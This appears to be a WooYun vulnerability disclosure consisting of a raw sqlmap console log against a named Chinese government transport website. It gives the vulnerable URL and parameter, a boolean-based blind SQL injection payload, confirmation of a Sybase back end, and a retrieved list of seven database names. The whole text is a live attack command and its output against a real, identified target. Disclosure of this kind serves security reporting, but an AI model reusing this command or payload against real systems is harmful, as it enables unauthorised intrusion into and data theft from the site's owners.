WooYun.org

D:\pyhton27\sqlmap>sqlmap.py -u "http://www.cdjt.gov.cn/list.jsp?type=1&bigClass
ID=9002375389145551836" --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 11:29:03
[11:29:03] [INFO] resuming back-end DBMS 'sybase'
[11:29:03] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: bigClassID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=1&bigClassID=9002375389145551836' AND 3544=3544 AND 'MKDs'='MK
Ds
---
[11:29:03] [INFO] testing Sybase
[11:29:03] [INFO] confirming Sybase
[11:29:03] [INFO] the back-end DBMS is Sybase
web application technology: JSP
back-end DBMS: Sybase
[11:29:03] [INFO] fetching database names
[11:29:03] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[11:29:03] [INFO] retrieved:
[11:29:04] [WARNING] reflective value(s) found and filtering out
7
[11:29:07] [INFO] fetching number of distinct values for column 'KcDW.name'
[11:29:07] [INFO] retrieved: 7
[11:29:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[11:29:53] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[11:29:55] [INFO] using column 'KcDW.name' as a pivot for retrieving row data
[11:29:55] [INFO] retrieved: JTJ
[11:30:10] [INFO] retrieved: Traffic
[11:30:41] [INFO] retrieved: mast
[11:31:23] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[11:31:46] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[11:32:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
er
[11:33:09] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
 going to retry the request
[11:33:11] [INFO] retrieved: model
[11:33:34] [INFO] retrieved: sybsy
[11:34:17] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
stem
[11:34:54] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[11:35:17] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[11:36:20] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
 going to retry the request
db
[11:36:30] [INFO] retrieved: sybsys
[11:37:21] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
tempro
[11:38:08] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[11:38:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[11:38:54] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
cs
[11:39:03] [INFO] retrieved:
[11:39:56] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
 going to retry the request
[11:40:48] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
 going to retry the request
tempdb
available databases [7]:
[*] JTJ
[*] master
[*] model
[*] sybsystemdb
[*] sybsystemprocs
[*] tempdb
[*] Traffic